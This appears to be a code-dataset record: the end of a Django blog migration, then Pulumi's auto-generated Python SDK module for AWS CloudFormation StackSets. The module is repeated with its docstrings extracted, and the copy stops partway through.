class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
("blog", "0002_auto_20210323_1834"),
]
operations = [
migrations.AddField(
model_name="post",
name="author",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.CASCADE,
to=settings.AUTH_USER_MODEL,
),
),
]
| en | 0.831672 | # Generated by Django 3.1.7 on 2021-03-24 17:41 | 1.513943 | 2 |
sdk/python/pulumi_aws/cloudformation/stack_set.py | mdop-wh/pulumi-aws | 0 | 8067 | <reponame>mdop-wh/pulumi-aws
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Dict, List, Mapping, Optional, Tuple, Union
from .. import _utilities, _tables
__all__ = ['StackSet']
class StackSet(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
administration_role_arn: Optional[pulumi.Input[str]] = None,
capabilities: Optional[pulumi.Input[List[pulumi.Input[str]]]] = None,
description: Optional[pulumi.Input[str]] = None,
execution_role_name: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
template_body: Optional[pulumi.Input[str]] = None,
template_url: Optional[pulumi.Input[str]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
Manages a CloudFormation StackSet. StackSets allow CloudFormation templates to be easily deployed across multiple accounts and regions via StackSet Instances (`cloudformation.StackSetInstance` resource). Additional information about StackSets can be found in the [AWS CloudFormation User Guide](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/what-is-cfnstacksets.html).
> **NOTE:** All template parameters, including those with a `Default`, must be configured or ignored with the `lifecycle` configuration block `ignore_changes` argument.
> **NOTE:** All `NoEcho` template parameters must be ignored with the `lifecycle` configuration block `ignore_changes` argument.
## Example Usage
```python
import pulumi
import pulumi_aws as aws
a_ws_cloud_formation_stack_set_administration_role_assume_role_policy = aws.iam.get_policy_document(statements=[aws.iam.GetPolicyDocumentStatementArgs(
actions=["sts:AssumeRole"],
effect="Allow",
principals=[aws.iam.GetPolicyDocumentStatementPrincipalArgs(
identifiers=["cloudformation.amazonaws.com"],
type="Service",
)],
)])
a_ws_cloud_formation_stack_set_administration_role = aws.iam.Role("aWSCloudFormationStackSetAdministrationRole", assume_role_policy=a_ws_cloud_formation_stack_set_administration_role_assume_role_policy.json)
example = aws.cloudformation.StackSet("example",
administration_role_arn=a_ws_cloud_formation_stack_set_administration_role.arn,
parameters={
"VPCCidr": "10.0.0.0/16",
},
template_body=\"\"\"{
"Parameters" : {
"VPCCidr" : {
"Type" : "String",
"Default" : "10.0.0.0/16",
"Description" : "Enter the CIDR block for the VPC. Default is 10.0.0.0/16."
}
},
"Resources" : {
"myVpc": {
"Type" : "AWS::EC2::VPC",
"Properties" : {
"CidrBlock" : { "Ref" : "VPCCidr" },
"Tags" : [
{"Key": "Name", "Value": "Primary_CF_VPC"}
]
}
}
}
}
\"\"\")
a_ws_cloud_formation_stack_set_administration_role_execution_policy_policy_document = example.execution_role_name.apply(lambda execution_role_name: aws.iam.get_policy_document(statements=[aws.iam.GetPolicyDocumentStatementArgs(
actions=["sts:AssumeRole"],
effect="Allow",
resources=[f"arn:aws:iam::*:role/{execution_role_name}"],
)]))
a_ws_cloud_formation_stack_set_administration_role_execution_policy_role_policy = aws.iam.RolePolicy("aWSCloudFormationStackSetAdministrationRoleExecutionPolicyRolePolicy",
policy=a_ws_cloud_formation_stack_set_administration_role_execution_policy_policy_document.json,
role=a_ws_cloud_formation_stack_set_administration_role.name)
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] administration_role_arn: Amazon Resource Number (ARN) of the IAM Role in the administrator account.
:param pulumi.Input[List[pulumi.Input[str]]] capabilities: A list of capabilities. Valid values: `CAPABILITY_IAM`, `CAPABILITY_NAMED_IAM`, `CAPABILITY_AUTO_EXPAND`.
:param pulumi.Input[str] description: Description of the StackSet.
:param pulumi.Input[str] execution_role_name: Name of the IAM Role in all target accounts for StackSet operations. Defaults to `AWSCloudFormationStackSetExecutionRole`.
:param pulumi.Input[str] name: Name of the StackSet. The name must be unique in the region where you create your StackSet. The name can contain only alphanumeric characters (case-sensitive) and hyphens. It must start with an alphabetic character and cannot be longer than 128 characters.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] parameters: Key-value map of input parameters for the StackSet template. All template parameters, including those with a `Default`, must be configured or ignored with `lifecycle` configuration block `ignore_changes` argument. All `NoEcho` template parameters must be ignored with the `lifecycle` configuration block `ignore_changes` argument.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of tags to associate with this StackSet and the Stacks created from it. AWS CloudFormation also propagates these tags to supported resources that are created in the Stacks. A maximum number of 50 tags can be specified.
:param pulumi.Input[str] template_body: String containing the CloudFormation template body. Maximum size: 51,200 bytes. Conflicts with `template_url`.
:param pulumi.Input[str] template_url: String containing the location of a file containing the CloudFormation template body. The URL must point to a template that is located in an Amazon S3 bucket. Maximum location file size: 460,800 bytes. Conflicts with `template_body`.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
if administration_role_arn is None:
raise TypeError("Missing required property 'administration_role_arn'")
__props__['administration_role_arn'] = administration_role_arn
__props__['capabilities'] = capabilities
__props__['description'] = description
__props__['execution_role_name'] = execution_role_name
__props__['name'] = name
__props__['parameters'] = parameters
__props__['tags'] = tags
__props__['template_body'] = template_body
__props__['template_url'] = template_url
__props__['arn'] = None
__props__['stack_set_id'] = None
super(StackSet, __self__).__init__(
'aws:cloudformation/stackSet:StackSet',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
administration_role_arn: Optional[pulumi.Input[str]] = None,
arn: Optional[pulumi.Input[str]] = None,
capabilities: Optional[pulumi.Input[List[pulumi.Input[str]]]] = None,
description: Optional[pulumi.Input[str]] = None,
execution_role_name: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
stack_set_id: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
template_body: Optional[pulumi.Input[str]] = None,
template_url: Optional[pulumi.Input[str]] = None) -> 'StackSet':
"""
Get an existing StackSet resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] administration_role_arn: Amazon Resource Number (ARN) of the IAM Role in the administrator account.
:param pulumi.Input[str] arn: Amazon Resource Name (ARN) of the StackSet.
:param pulumi.Input[List[pulumi.Input[str]]] capabilities: A list of capabilities. Valid values: `CAPABILITY_IAM`, `CAPABILITY_NAMED_IAM`, `CAPABILITY_AUTO_EXPAND`.
:param pulumi.Input[str] description: Description of the StackSet.
:param pulumi.Input[str] execution_role_name: Name of the IAM Role in all target accounts for StackSet operations. Defaults to `AWSCloudFormationStackSetExecutionRole`.
:param pulumi.Input[str] name: Name of the StackSet. The name must be unique in the region where you create your StackSet. The name can contain only alphanumeric characters (case-sensitive) and hyphens. It must start with an alphabetic character and cannot be longer than 128 characters.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] parameters: Key-value map of input parameters for the StackSet template. All template parameters, including those with a `Default`, must be configured or ignored with `lifecycle` configuration block `ignore_changes` argument. All `NoEcho` template parameters must be ignored with the `lifecycle` configuration block `ignore_changes` argument.
:param pulumi.Input[str] stack_set_id: Unique identifier of the StackSet.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of tags to associate with this StackSet and the Stacks created from it. AWS CloudFormation also propagates these tags to supported resources that are created in the Stacks. A maximum number of 50 tags can be specified.
:param pulumi.Input[str] template_body: String containing the CloudFormation template body. Maximum size: 51,200 bytes. Conflicts with `template_url`.
:param pulumi.Input[str] template_url: String containing the location of a file containing the CloudFormation template body. The URL must point to a template that is located in an Amazon S3 bucket. Maximum location file size: 460,800 bytes. Conflicts with `template_body`.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
__props__["administration_role_arn"] = administration_role_arn
__props__["arn"] = arn
__props__["capabilities"] = capabilities
__props__["description"] = description
__props__["execution_role_name"] = execution_role_name
__props__["name"] = name
__props__["parameters"] = parameters
__props__["stack_set_id"] = stack_set_id
__props__["tags"] = tags
__props__["template_body"] = template_body
__props__["template_url"] = template_url
return StackSet(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="administrationRoleArn")
def administration_role_arn(self) -> pulumi.Output[str]:
"""
Amazon Resource Number (ARN) of the IAM Role in the administrator account.
"""
return pulumi.get(self, "administration_role_arn")
@property
@pulumi.getter
def arn(self) -> pulumi.Output[str]:
"""
Amazon Resource Name (ARN) of the StackSet.
"""
return pulumi.get(self, "arn")
@property
@pulumi.getter
def capabilities(self) -> pulumi.Output[Optional[List[str]]]:
"""
A list of capabilities. Valid values: `CAPABILITY_IAM`, `CAPABILITY_NAMED_IAM`, `CAPABILITY_AUTO_EXPAND`.
"""
return pulumi.get(self, "capabilities")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
Description of the StackSet.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="executionRoleName")
def execution_role_name(self) -> pulumi.Output[Optional[str]]:
"""
Name of the IAM Role in all target accounts for StackSet operations. Defaults to `AWSCloudFormationStackSetExecutionRole`.
"""
return pulumi.get(self, "execution_role_name")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Name of the StackSet. The name must be unique in the region where you create your StackSet. The name can contain only alphanumeric characters (case-sensitive) and hyphens. It must start with an alphabetic character and cannot be longer than 128 characters.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def parameters(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Key-value map of input parameters for the StackSet template. All template parameters, including those with a `Default`, must be configured or ignored with `lifecycle` configuration block `ignore_changes` argument. All `NoEcho` template parameters must be ignored with the `lifecycle` configuration block `ignore_changes` argument.
"""
return pulumi.get(self, "parameters")
@property
@pulumi.getter(name="stackSetId")
def stack_set_id(self) -> pulumi.Output[str]:
"""
Unique identifier of the StackSet.
"""
return pulumi.get(self, "stack_set_id")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Key-value map of tags to associate with this StackSet and the Stacks created from it. AWS CloudFormation also propagates these tags to supported resources that are created in the Stacks. A maximum number of 50 tags can be specified.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="templateBody")
def template_body(self) -> pulumi.Output[str]:
"""
String containing the CloudFormation template body. Maximum size: 51,200 bytes. Conflicts with `template_url`.
"""
return pulumi.get(self, "template_body")
@property
@pulumi.getter(name="templateUrl")
def template_url(self) -> pulumi.Output[Optional[str]]:
"""
String containing the location of a file containing the CloudFormation template body. The URL must point to a template that is located in an Amazon S3 bucket. Maximum location file size: 460,800 bytes. Conflicts with `template_body`.
"""
return pulumi.get(self, "template_url")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Dict, List, Mapping, Optional, Tuple, Union
from .. import _utilities, _tables
__all__ = ['StackSet']
class StackSet(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
administration_role_arn: Optional[pulumi.Input[str]] = None,
capabilities: Optional[pulumi.Input[List[pulumi.Input[str]]]] = None,
description: Optional[pulumi.Input[str]] = None,
execution_role_name: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
template_body: Optional[pulumi.Input[str]] = None,
template_url: Optional[pulumi.Input[str]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
Manages a CloudFormation StackSet. StackSets allow CloudFormation templates to be easily deployed across multiple accounts and regions via StackSet Instances (`cloudformation.StackSetInstance` resource). Additional information about StackSets can be found in the [AWS CloudFormation User Guide](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/what-is-cfnstacksets.html).
> **NOTE:** All template parameters, including those with a `Default`, must be configured or ignored with the `lifecycle` configuration block `ignore_changes` argument.
> **NOTE:** All `NoEcho` template parameters must be ignored with the `lifecycle` configuration block `ignore_changes` argument.
## Example Usage
```python
import pulumi
import pulumi_aws as aws
a_ws_cloud_formation_stack_set_administration_role_assume_role_policy = aws.iam.get_policy_document(statements=[aws.iam.GetPolicyDocumentStatementArgs(
actions=["sts:AssumeRole"],
effect="Allow",
principals=[aws.iam.GetPolicyDocumentStatementPrincipalArgs(
identifiers=["cloudformation.amazonaws.com"],
type="Service",
)],
)])
a_ws_cloud_formation_stack_set_administration_role = aws.iam.Role("aWSCloudFormationStackSetAdministrationRole", assume_role_policy=a_ws_cloud_formation_stack_set_administration_role_assume_role_policy.json)
example = aws.cloudformation.StackSet("example",
administration_role_arn=a_ws_cloud_formation_stack_set_administration_role.arn,
parameters={
"VPCCidr": "10.0.0.0/16",
},
template_body=\"\"\"{
"Parameters" : {
"VPCCidr" : {
"Type" : "String",
"Default" : "10.0.0.0/16",
"Description" : "Enter the CIDR block for the VPC. Default is 10.0.0.0/16."
}
},
"Resources" : {
"myVpc": {
"Type" : "AWS::EC2::VPC",
"Properties" : {
"CidrBlock" : { "Ref" : "VPCCidr" },
"Tags" : [
{"Key": "Name", "Value": "Primary_CF_VPC"}
]
}
}
}
}
\"\"\")
a_ws_cloud_formation_stack_set_administration_role_execution_policy_policy_document = example.execution_role_name.apply(lambda execution_role_name: aws.iam.get_policy_document(statements=[aws.iam.GetPolicyDocumentStatementArgs(
actions=["sts:AssumeRole"],
effect="Allow",
resources=[f"arn:aws:iam::*:role/{execution_role_name}"],
)]))
a_ws_cloud_formation_stack_set_administration_role_execution_policy_role_policy = aws.iam.RolePolicy("aWSCloudFormationStackSetAdministrationRoleExecutionPolicyRolePolicy",
policy=a_ws_cloud_formation_stack_set_administration_role_execution_policy_policy_document.json,
role=a_ws_cloud_formation_stack_set_administration_role.name)
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] administration_role_arn: Amazon Resource Number (ARN) of the IAM Role in the administrator account.
:param pulumi.Input[List[pulumi.Input[str]]] capabilities: A list of capabilities. Valid values: `CAPABILITY_IAM`, `CAPABILITY_NAMED_IAM`, `CAPABILITY_AUTO_EXPAND`.
:param pulumi.Input[str] description: Description of the StackSet.
:param pulumi.Input[str] execution_role_name: Name of the IAM Role in all target accounts for StackSet operations. Defaults to `AWSCloudFormationStackSetExecutionRole`.
:param pulumi.Input[str] name: Name of the StackSet. The name must be unique in the region where you create your StackSet. The name can contain only alphanumeric characters (case-sensitive) and hyphens. It must start with an alphabetic character and cannot be longer than 128 characters.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] parameters: Key-value map of input parameters for the StackSet template. All template parameters, including those with a `Default`, must be configured or ignored with `lifecycle` configuration block `ignore_changes` argument. All `NoEcho` template parameters must be ignored with the `lifecycle` configuration block `ignore_changes` argument.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of tags to associate with this StackSet and the Stacks created from it. AWS CloudFormation also propagates these tags to supported resources that are created in the Stacks. A maximum number of 50 tags can be specified.
:param pulumi.Input[str] template_body: String containing the CloudFormation template body. Maximum size: 51,200 bytes. Conflicts with `template_url`.
:param pulumi.Input[str] template_url: String containing the location of a file containing the CloudFormation template body. The URL must point to a template that is located in an Amazon S3 bucket. Maximum location file size: 460,800 bytes. Conflicts with `template_body`.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
if administration_role_arn is None:
raise TypeError("Missing required property 'administration_role_arn'")
__props__['administration_role_arn'] = administration_role_arn
__props__['capabilities'] = capabilities
__props__['description'] = description
__props__['execution_role_name'] = execution_role_name
__props__['name'] = name
__props__['parameters'] = parameters
__props__['tags'] = tags
__props__['template_body'] = template_body
__props__['template_url'] = template_url
__props__['arn'] = None
__props__['stack_set_id'] = None
super(StackSet, __self__).__init__(
'aws:cloudformation/stackSet:StackSet',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
administration_role_arn: Optional[pulumi.Input[str]] = None,
arn: Optional[pulumi.Input[str]] = None,
capabilities: Optional[pulumi.Input[List[pulumi.Input[str]]]] = None,
description: Optional[pulumi.Input[str]] = None,
execution_role_name: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
stack_set_id: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
template_body: Optional[pulumi.Input[str]] = None,
template_url: Optional[pulumi.Input[str]] = None) -> 'StackSet':
"""
Get an existing StackSet resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] administration_role_arn: Amazon Resource Number (ARN) of the IAM Role in the administrator account.
:param pulumi.Input[str] arn: Amazon Resource Name (ARN) of the StackSet.
:param pulumi.Input[List[pulumi.Input[str]]] capabilities: A list of capabilities. Valid values: `CAPABILITY_IAM`, `CAPABILITY_NAMED_IAM`, `CAPABILITY_AUTO_EXPAND`.
:param pulumi.Input[str] description: Description of the StackSet.
:param pulumi.Input[str] execution_role_name: Name of the IAM Role in all target accounts for StackSet operations. Defaults to `AWSCloudFormationStackSetExecutionRole`.
:param pulumi.Input[str] name: Name of the StackSet. The name must be unique in the region where you create your StackSet. The name can contain only alphanumeric characters (case-sensitive) and hyphens. It must start with an alphabetic character and cannot be longer than 128 characters.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] parameters: Key-value map of input parameters for the StackSet template. All template parameters, including those with a `Default`, must be configured or ignored with `lifecycle` configuration block `ignore_changes` argument. All `NoEcho` template parameters must be ignored with the `lifecycle` configuration block `ignore_changes` argument.
:param pulumi.Input[str] stack_set_id: Unique identifier of the StackSet.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of tags to associate with this StackSet and the Stacks created from it. AWS CloudFormation also propagates these tags to supported resources that are created in the Stacks. A maximum number of 50 tags can be specified.
:param pulumi.Input[str] template_body: String containing the CloudFormation template body. Maximum size: 51,200 bytes. Conflicts with `template_url`.
:param pulumi.Input[str] template_url: String containing the location of a file containing the CloudFormation template body. The URL must point to a template that is located in an Amazon S3 bucket. Maximum location file size: 460,800 bytes. Conflicts with `template_body`.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
__props__["administration_role_arn"] = administration_role_arn
__props__["arn"] = arn
__props__["capabilities"] = capabilities
__props__["description"] = description
__props__["execution_role_name"] = execution_role_name
__props__["name"] = name
__props__["parameters"] = parameters
__props__["stack_set_id"] = stack_set_id
__props__["tags"] = tags
__props__["template_body"] = template_body
__props__["template_url"] = template_url
return StackSet(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="administrationRoleArn")
def administration_role_arn(self) -> pulumi.Output[str]:
"""
Amazon Resource Number (ARN) of the IAM Role in the administrator account.
"""
return pulumi.get(self, "administration_role_arn")
@property
@pulumi.getter
def arn(self) -> pulumi.Output[str]:
"""
Amazon Resource Name (ARN) of the StackSet.
"""
return pulumi.get(self, "arn")
@property
@pulumi.getter
def capabilities(self) -> pulumi.Output[Optional[List[str]]]:
"""
A list of capabilities. Valid values: `CAPABILITY_IAM`, `CAPABILITY_NAMED_IAM`, `CAPABILITY_AUTO_EXPAND`.
"""
return pulumi.get(self, "capabilities")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
Description of the StackSet.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="executionRoleName")
def execution_role_name(self) -> pulumi.Output[Optional[str]]:
"""
Name of the IAM Role in all target accounts for StackSet operations. Defaults to `AWSCloudFormationStackSetExecutionRole`.
"""
return pulumi.get(self, "execution_role_name")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Name of the StackSet. The name must be unique in the region where you create your StackSet. The name can contain only alphanumeric characters (case-sensitive) and hyphens. It must start with an alphabetic character and cannot be longer than 128 characters.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def parameters(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Key-value map of input parameters for the StackSet template. All template parameters, including those with a `Default`, must be configured or ignored with `lifecycle` configuration block `ignore_changes` argument. All `NoEcho` template parameters must be ignored with the `lifecycle` configuration block `ignore_changes` argument.
"""
return pulumi.get(self, "parameters")
@property
@pulumi.getter(name="stackSetId")
def stack_set_id(self) -> pulumi.Output[str]:
"""
Unique identifier of the StackSet.
"""
return pulumi.get(self, "stack_set_id")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Key-value map of tags to associate with this StackSet and the Stacks created from it. AWS CloudFormation also propagates these tags to supported resources that are created in the Stacks. A maximum number of 50 tags can be specified.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="templateBody")
def template_body(self) -> pulumi.Output[str]:
"""
String containing the CloudFormation template body. Maximum size: 51,200 bytes. Conflicts with `template_url`.
"""
return pulumi.get(self, "template_body")
@property
@pulumi.getter(name="templateUrl")
def template_url(self) -> pulumi.Output[Optional[str]]:
"""
String containing the location of a file containing the CloudFormation template body. The URL must point to a template that is located in an Amazon S3 bucket. Maximum location file size: 460,800 bytes. Conflicts with `template_body`.
"""
return pulumi.get(self, "template_url")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop | en | 0.559059 | # coding=utf-8 # *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** Manages a CloudFormation StackSet. StackSets allow CloudFormation templates to be easily deployed across multiple accounts and regions via StackSet Instances (`cloudformation.StackSetInstance` resource). Additional information about StackSets can be found in the [AWS CloudFormation User Guide](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/what-is-cfnstacksets.html). > **NOTE:** All template parameters, including those with a `Default`, must be configured or ignored with the `lifecycle` configuration block `ignore_changes` argument. > **NOTE:** All `NoEcho` template parameters must be ignored with the `lifecycle` configuration block `ignore_changes` argument. ## Example Usage ```python import pulumi import pulumi_aws as aws a_ws_cloud_formation_stack_set_administration_role_assume_role_policy = aws.iam.get_policy_document(statements=[aws.iam.GetPolicyDocumentStatementArgs( actions=["sts:AssumeRole"], effect="Allow", principals=[aws.iam.GetPolicyDocumentStatementPrincipalArgs( identifiers=["cloudformation.amazonaws.com"], type="Service", )], )]) a_ws_cloud_formation_stack_set_administration_role = aws.iam.Role("aWSCloudFormationStackSetAdministrationRole", assume_role_policy=a_ws_cloud_formation_stack_set_administration_role_assume_role_policy.json) example = aws.cloudformation.StackSet("example", administration_role_arn=a_ws_cloud_formation_stack_set_administration_role.arn, parameters={ "VPCCidr": "10.0.0.0/16", }, template_body=\"\"\"{ "Parameters" : { "VPCCidr" : { "Type" : "String", "Default" : "10.0.0.0/16", "Description" : "Enter the CIDR block for the VPC. Default is 10.0.0.0/16." } }, "Resources" : { "myVpc": { "Type" : "AWS::EC2::VPC", "Properties" : { "CidrBlock" : { "Ref" : "VPCCidr" }, "Tags" : [ {"Key": "Name", "Value": "Primary_CF_VPC"} ] } } } } \"\"\") a_ws_cloud_formation_stack_set_administration_role_execution_policy_policy_document = example.execution_role_name.apply(lambda execution_role_name: aws.iam.get_policy_document(statements=[aws.iam.GetPolicyDocumentStatementArgs( actions=["sts:AssumeRole"], effect="Allow", resources=[f"arn:aws:iam::*:role/{execution_role_name}"], )])) a_ws_cloud_formation_stack_set_administration_role_execution_policy_role_policy = aws.iam.RolePolicy("aWSCloudFormationStackSetAdministrationRoleExecutionPolicyRolePolicy", policy=a_ws_cloud_formation_stack_set_administration_role_execution_policy_policy_document.json, role=a_ws_cloud_formation_stack_set_administration_role.name) ``` :param str resource_name: The name of the resource. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] administration_role_arn: Amazon Resource Number (ARN) of the IAM Role in the administrator account. :param pulumi.Input[List[pulumi.Input[str]]] capabilities: A list of capabilities. Valid values: `CAPABILITY_IAM`, `CAPABILITY_NAMED_IAM`, `CAPABILITY_AUTO_EXPAND`. :param pulumi.Input[str] description: Description of the StackSet. :param pulumi.Input[str] execution_role_name: Name of the IAM Role in all target accounts for StackSet operations. Defaults to `AWSCloudFormationStackSetExecutionRole`. :param pulumi.Input[str] name: Name of the StackSet. The name must be unique in the region where you create your StackSet. The name can contain only alphanumeric characters (case-sensitive) and hyphens. It must start with an alphabetic character and cannot be longer than 128 characters. :param pulumi.Input[Mapping[str, pulumi.Input[str]]] parameters: Key-value map of input parameters for the StackSet template. All template parameters, including those with a `Default`, must be configured or ignored with `lifecycle` configuration block `ignore_changes` argument. All `NoEcho` template parameters must be ignored with the `lifecycle` configuration block `ignore_changes` argument. :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of tags to associate with this StackSet and the Stacks created from it. AWS CloudFormation also propagates these tags to supported resources that are created in the Stacks. A maximum number of 50 tags can be specified. :param pulumi.Input[str] template_body: String containing the CloudFormation template body. Maximum size: 51,200 bytes. Conflicts with `template_url`. :param pulumi.Input[str] template_url: String containing the location of a file containing the CloudFormation template body. The URL must point to a template that is located in an Amazon S3 bucket. Maximum location file size: 460,800 bytes. Conflicts with `template_body`. Get an existing StackSet resource's state with the given name, id, and optional extra properties used to qualify the lookup. :param str resource_name: The unique name of the resulting resource. :param pulumi.Input[str] id: The unique provider ID of the resource to lookup. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] administration_role_arn: Amazon Resource Number (ARN) of the IAM Role in the administrator account. :param pulumi.Input[str] arn: Amazon Resource Name (ARN) of the StackSet. :param pulumi.Input[List[pulumi.Input[str]]] capabilities: A list of capabilities. Valid values: `CAPABILITY_IAM`, `CAPABILITY_NAMED_IAM`, `CAPABILITY_AUTO_EXPAND`. :param pulumi.Input[str] description: Description of the StackSet. :param pulumi.Input[str] execution_role_name: Name of the IAM Role in all target accounts for StackSet operations. Defaults to `AWSCloudFormationStackSetExecutionRole`. :param pulumi.Input[str] name: Name of the StackSet. The name must be unique in the region where you create your StackSet. The name can contain only alphanumeric characters (case-sensitive) and hyphens. It must start with an alphabetic character and cannot be longer than 128 characters. :param pulumi.Input[Mapping[str, pulumi.Input[str]]] parameters: Key-value map of input parameters for the StackSet template. All template parameters, including those with a `Default`, must be configured or ignored with `lifecycle` configuration block `ignore_changes` argument. All `NoEcho` template parameters must be ignored with the `lifecycle` configuration block `ignore_changes` argument. :param pulumi.Input[str] stack_set_id: Unique identifier of the StackSet. :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of tags to associate with this StackSet and the Stacks created from it. AWS CloudFormation also propagates these tags to supported resources that are created in the Stacks. A maximum number of 50 tags can be specified. :param pulumi.Input[str] template_body: String containing the CloudFormation template body. Maximum size: 51,200 bytes. Conflicts with `template_url`. :param pulumi.Input[str] template_url: String containing the location of a file containing the CloudFormation template body. The URL must point to a template that is located in an Amazon S3 bucket. Maximum location file size: 460,800 bytes. Conflicts with `template_body`. Amazon Resource Number (ARN) of the IAM Role in the administrator account. Amazon Resource Name (ARN) of the StackSet. A list of capabilities. Valid values: `CAPABILITY_IAM`, `CAPABILITY_NAMED_IAM`, `CAPABILITY_AUTO_EXPAND`. Description of the StackSet. Name of the IAM Role in all target accounts for StackSet operations. Defaults to 